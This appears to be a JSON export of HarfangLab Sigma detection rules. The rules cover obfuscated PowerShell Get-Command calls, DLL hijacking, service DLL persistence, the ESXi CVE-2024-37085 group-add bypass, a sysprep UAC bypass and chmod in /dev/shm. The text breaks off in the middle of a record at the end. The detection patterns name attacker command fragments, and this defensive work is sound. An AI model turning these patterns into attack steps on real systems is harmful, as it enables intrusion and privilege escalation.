"content": "title: Suspicious Get-Command Cmdlet Executed via PowerShell\nid: 7ae9c4cc-ed50-4fbe-bc8d-8ccdea2aa0c4\ndescription: |\n Detects the suspicious usage of the PowerShell Get-Command cmdlet and its built-in gcm alias.\n The Get-Command cmdlet gets all commands that are installed on the computer and is used, in combination with a filter, by attackers to call cmdlets in an obfuscated way.\n It is recommended to investigate the PowerShell script to determine its legitimacy.\nreferences:\n - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/get-command\n - https://www.deepinstinct.com/blog/muddyc2go-latest-c2-framework-used-by-iranian-apt-muddywater-spotted-in-israel\n - https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1027/010/\ndate: 2023/11/10\nmodified: 2025/04/09\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.defense_evasion\n - attack.t1027.010\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n - '&(Get-Command'\n - '& (Get-Command'\n - '&(gcm'\n - '& (gcm'\n\n exclusion_arcgis:\n - PowershellScriptPath:\n - '?:\\Program Files\\WindowsPowerShell\\Modules\\ArcGIS\\DscResources\\ArcGIS_xFirewall\\ArcGIS_xFirewall.psm1'\n - '?:\\Program Files\\WindowsPowerShell\\Modules\\ArcGIS\\\\*\\DscResources\\ArcGIS_xFirewall\\ArcGIS_xFirewall.psm1'\n - PowershellCommand|contains: 'return &(Get-Command ?Get-NetFirewall$Property?) 
-AssociatedNetFireWallRule $FireWallRule'\n\n exclusion_velociraptor:\n ProcessParentImage: '?:\\Program Files\\Velociraptor\\Velociraptor.exe'\n\n exclusion_warp:\n ProcessCommandLine|contains|all:\n - 'PSReadline;$global:_warpOriginalPrompt ='\n - '$global:_warpSessionId ='\n - 'session_id = $_warpSessionId; shell'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7ae9c4cc-ed50-4fbe-bc8d-8ccdea2aa0c4",
"rule_name": "Suspicious Get-Command Cmdlet Executed via PowerShell",
"rule_description": "Detects the suspicious usage of the PowerShell Get-Command cmdlet and its built-in gcm alias.\nThe Get-Command cmdlet gets all commands that are installed on the computer and is used, in combination with a filter, by attackers to call cmdlets in an obfuscated way.\nIt is recommended to investigate the PowerShell script to determine its legitimacy.\n",
"rule_creation_date": "2023-11-10",
"rule_modified_date": "2025-04-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1027.010",
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7b3b21b7-c748-42a2-98b5-45be960c87bd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592217Z",
"creation_date": "2026-03-23T11:45:34.592220Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592228Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_shrpubw.yml",
"content": "title: DLL Hijacking via shrpubw.exe\nid: 7b3b21b7-c748-42a2-98b5-45be960c87bd\ndescription: |\n Detects potential Windows DLL Hijacking via shrpubw.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'shrpubw.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\aclui.dll'\n - '\\mfc42u.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7b3b21b7-c748-42a2-98b5-45be960c87bd",
"rule_name": "DLL Hijacking via shrpubw.exe",
"rule_description": "Detects potential Windows DLL Hijacking via shrpubw.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7b3c8d99-ed7c-436d-aeb2-0f5cb60ebab4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072218Z",
"creation_date": "2026-03-23T11:45:34.072220Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072224Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.ired.team/offensive-security/persistence/persisting-in-svchost.exe-with-a-service-dll-servicemain",
"https://attack.mitre.org/techniques/T1543/003/"
],
"name": "t1543_001_service_dll_no_envvars.yml",
"content": "title: Service DLL Without Environment Variable\nid: 7b3c8d99-ed7c-436d-aeb2-0f5cb60ebab4\ndescription: |\n Detects the creation or modification of a service DLL without using environment variables such as %System32% or %WinDir% to construct the path of the DLL to launch.\n Adversaries may modify or create a new service based on a DLL to persist on a system.\n It is recommended to check the origin of the library to determine its legitimacy and the activity of the process for malicious behavior.\nreferences:\n - https://www.ired.team/offensive-security/persistence/persisting-in-svchost.exe-with-a-service-dll-servicemain\n - https://attack.mitre.org/techniques/T1543/003/\ndate: 2024/09/26\nmodified: 2025/05/06\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1543.003\n - attack.execution\n - attack.t1569.002\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\\\*\\Parameters\\\\ServiceDll'\n\n filter_envvars:\n Details|contains: \"%\"\n\n exclusion_spool:\n Image: '?:\\Windows\\System32\\regsvr32.exe'\n Details|startswith:\n - '?:\\WINDOWS\\system32\\spool\\drivers\\x64\\3\\'\n - '?:\\WINDOWS\\system32\\spool\\drivers\\W32X86\\3\\'\n\n exclusion_pml_driver:\n Details: '?:\\Windows\\System32\\HPZipm12.dll'\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\Pml Driver HPZ12\\Parameters\\ServiceDll'\n\n exclusion_msiexec:\n Image: '?:\\Windows\\System32\\msiexec.exe'\n\n exclusion_w32time:\n Image: '?:\\Windows\\System32\\w32tm.exe'\n Details: '?:\\WINDOWS\\SYSTEM32\\w32time.DLL'\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\w32time\\Parameters\\ServiceDll'\n\n exclusion_azure:\n Image: '?:\\Program Files\\Microsoft\\AzureAttestService\\AzureAttestServiceInstaller.exe'\n Details: '?:\\Program 
Files\\Microsoft\\AzureAttestService\\AzureAttestService.dll'\n\n exclusion_hp:\n ProcessParentImage: '?:\\Windows\\System32\\msiexec.exe'\n Details: '?:\\Program Files (x86)\\HP\\Digital Imaging\\bin\\hpq*.dll' # (hpqddsvc.dll, hpqcxs08.dll)\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7b3c8d99-ed7c-436d-aeb2-0f5cb60ebab4",
"rule_name": "Service DLL Without Environment Variable",
"rule_description": "Detects the creation or modification of a service DLL without using environment variables such as %System32% or %WinDir% to construct the path of the DLL to launch.\nAdversaries may modify or create a new service based on a DLL to persist on a system.\nIt is recommended to check the origin of the library to determine its legitimacy and the activity of the process for malicious behavior.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-05-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1543.003",
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7b4c77e7-bb49-48f3-a0a5-dad094238be9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602838Z",
"creation_date": "2026-03-23T11:45:34.602842Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602849Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_gpfixup.yml",
"content": "title: DLL Hijacking via gpfixup.exe\nid: 7b4c77e7-bb49-48f3-a0a5-dad094238be9\ndescription: |\n Detects potential Windows DLL Hijacking via gpfixup.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'gpfixup.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\activeds.dll'\n - '\\credui.dll'\n - '\\dsrole.dll'\n - '\\logoncli.dll'\n - '\\netutils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7b4c77e7-bb49-48f3-a0a5-dad094238be9",
"rule_name": "DLL Hijacking via gpfixup.exe",
"rule_description": "Detects potential Windows DLL Hijacking via gpfixup.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7b4df4b6-addb-4e81-b827-888adb454c64",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610443Z",
"creation_date": "2026-03-23T11:45:34.610446Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610454Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.rapid7.com/blog/post/2024/07/30/vmware-esxi-cve-2024-37085-targeted-in-ransomware-campaigns/",
"https://attack.mitre.org/techniques/T1078/002"
],
"name": "t1078_002_possible_cve_2024_37085_exp_net.yml",
"content": "title: Possible Exploitation of ESXi CVE-2024-37085 Authentication Bypass via net.exe\nid: 7b4df4b6-addb-4e81-b827-888adb454c64\ndescription: |\n Detects net.exe commands possibly indicating the exploitation of an authentication bypass vulnerability in domain-joined ESXi hypervisors (CVE-2024-37085).\n VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named \"ESX Admins\" to have full administrative access by default.\n This group is not a built-in group in Active Directory and does not exist by default.\n It is recommended to investigate and determine if this is a legitimate administrative action.\nreferences:\n - https://www.rapid7.com/blog/post/2024/07/30/vmware-esxi-cve-2024-37085-targeted-in-ransomware-campaigns/\n - https://attack.mitre.org/techniques/T1078/002\ndate: 2024/07/30\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1078.002\n - cve.2024-37085\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2024-37085\n - classification.Windows.Exploit.ESXi\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\net1.exe'\n CommandLine|contains|all:\n - ' group'\n - 'ESX Admins'\n - ' ?add'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7b4df4b6-addb-4e81-b827-888adb454c64",
"rule_name": "Possible Exploitation of ESXi CVE-2024-37085 Authentication Bypass via net.exe",
"rule_description": "Detects net.exe commands possibly indicating the exploitation of an authentication bypass vulnerability in domain-joined ESXi hypervisors (CVE-2024-37085).\nVMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named \"ESX Admins\" to have full administrative access by default.\nThis group is not a built-in group in Active Directory and does not exist by default.\nIt is recommended to investigate and determine if this is a legitimate administrative action.\n",
"rule_creation_date": "2024-07-30",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7b7ca954-dcc7-4400-81d0-5affcc73a639",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092462Z",
"creation_date": "2026-03-23T11:45:34.092464Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092468Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blogs.jpcert.or.jp/en/2015/02/a-new-uac-bypass-method-that-dridex-uses.html",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_sysprep.yml",
"content": "title: UAC Bypass Executed via sysprep\nid: 7b7ca954-dcc7-4400-81d0-5affcc73a639\ndescription: |\n Detects the execution of a UAC bypass via sysprep.exe through a DLL hijacking.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible to look for suspicious behavior, as well as the DLL loaded to look for malicious content.\nreferences:\n - https://blogs.jpcert.or.jp/en/2015/02/a-new-uac-bypass-method-that-dridex-uses.html\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/09/17\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection_standard_hijack:\n Image: '?:\\Windows\\System32\\sysprep\\sysprep.exe'\n ImageLoaded|endswith: '\\Windows\\System32\\sysprep\\\\*.dll'\n\n selection_renamed_hijack:\n Image: '?:\\Windows\\System32\\oobe.exe'\n ImageLoaded|endswith: '\\Windows\\System32\\\\*.dll'\n\n selection_comctl32_sxs:\n Image: '?:\\Windows\\System32\\sysprep\\sysprep.exe'\n ImageLoaded|endswith: '\\Windows\\System32\\sysprep\\sysprep.exe.local\\\\*\\comctl32.dll'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n exclusion_other_signed:\n Signed: 'true'\n Signature:\n - 'Sophos Ltd' # C:\\Windows\\System32\\hmpalert.dll\n - 'Symantec Corporation' # C:\\Windows\\System32\\sysfer.dll\n 
- 'NVIDIA Corporation' # C:\\Windows\\System32\\DriverStore\\FileRepository\\nvdm.inf_amd64_0d270efa18f661b0\\nvdlistx.dll\n - 'Nexthink S.A.' # c:\\windows\\system32\\nxtwpm-6.29.2.1.dll\n - 'National Instruments Corporation' # c:\\windows\\system32\\nimdnsResponder.dll\n - 'Citrix Systems, Inc.' # C:\\Windows\\System32\\CtxKerbProvider.dll\n - 'Trend Micro, Inc.' # C:\\Windows\\System32\\tmumh\\20019\\TmMon\\2.9.0.1041\\tmmon64.dll, C:\\Windows\\System32\\tmumh\\20019\\AddOn\\8.55.0.1129\\TmUmEvt64.dll\n\n exclusion_not_signed:\n sha256:\n - '29b4ed3795cec1177eb367132914ce21c194cdec5db9dc923fd928c85e94d821' # C:\\Windows\\System32\\apphelp.dll\n - '3603fadca0060bd201148f9d59e4e2627f024609a6463ab525b5d1ad17bdcd10' # C:\\Windows\\System32\\RpcRtRemote.dll\n - '127506d1db38275614cbeb047c133718ef9d03266ba9c98be55ec7847cfc9c3d' # C:\\Windows\\System32\\netutils.dll\n\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7b7ca954-dcc7-4400-81d0-5affcc73a639",
"rule_name": "UAC Bypass Executed via sysprep",
"rule_description": "Detects the execution of a UAC bypass via sysprep.exe through a DLL hijacking.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible to look for suspicious behavior, as well as the DLL loaded to look for malicious content.\n",
"rule_creation_date": "2020-09-17",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7b819fb7-ea04-4fb8-a01f-693a84ccb874",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088019Z",
"creation_date": "2026-03-23T11:45:34.088021Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088026Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.talosintelligence.com/mustang-panda-targets-europe/",
"https://attack.mitre.org/techniques/T1036/"
],
"name": "t1036_suspicious_execution_from_user_public_libraries.yml",
"content": "title: Suspicious Process Executed from Libraries Folder\nid: 7b819fb7-ea04-4fb8-a01f-693a84ccb874\ndescription: |\n Detects a suspicious execution from the libraries folder of the Public user.\n This folder is an uncommon directory for binaries to execute from and is often abused by attackers.\n It is recommended to analyze the executed process to look for malicious behavior or content.\nreferences:\n - https://blog.talosintelligence.com/mustang-panda-targets-europe/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2024/03/06\nmodified: 2025/01/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|startswith: '?:\\Users\\Public\\Libraries\\'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7b819fb7-ea04-4fb8-a01f-693a84ccb874",
"rule_name": "Suspicious Process Executed from Libraries Folder",
"rule_description": "Detects a suspicious execution from the libraries folder of the Public user.\nThis folder is an uncommon directory for binaries to execute from and is often abused by attackers.\nIt is recommended to analyze the executed process to look for malicious behavior or content.\n",
"rule_creation_date": "2024-03-06",
"rule_modified_date": "2025-01-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7b923961-8481-4b2a-beb4-2f26146366fa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086388Z",
"creation_date": "2026-03-23T11:45:34.086390Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086394Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor",
"https://attack.mitre.org/techniques/T1222/002/"
],
"name": "t1222_002_chmod_executable_in_shared_memory_folder.yml",
"content": "title: Execution Permission Set to a File in a Shared Memory Folder\nid: 7b923961-8481-4b2a-beb4-2f26146366fa\ndescription: |\n Detects a suspicious attempt to give execution permissions to a file located in a shared memory folder using the chmod command.\n This is often used by attackers to give execution permission to their malicious tools, either compiled locally or downloaded from the internet.\n It is recommended to investigate the file to determine its legitimacy.\nreferences:\n - https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor\n - https://attack.mitre.org/techniques/T1222/002/\ndate: 2024/10/09\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - attack.defense_evasion\n - attack.t1222.002\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n Kind: 'chmod'\n Mode|endswith: '7??'\n ProcessImage|endswith: '/chmod'\n Path|startswith: '/dev/shm'\n\n filter_directories:\n Path|endswith: '/'\n\n filter_recursive:\n ProcessCommandLine|contains: ' -R '\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7b923961-8481-4b2a-beb4-2f26146366fa",
"rule_name": "Execution Permission Set to a File in a Shared Memory Folder",
"rule_description": "Detects a suspicious attempt to give execution permissions to a file located in a shared memory folder using the chmod command.\nThis is often used by attackers to give execution permission to their malicious tools, either compiled locally or downloaded from the internet.\nIt is recommended to investigate the file to determine its legitimacy.\n",
"rule_creation_date": "2024-10-09",
"rule_modified_date": "2025-01-15",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004",
"attack.t1222.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7bcf3a36-198e-4009-b9ca-2d44973c9bda",
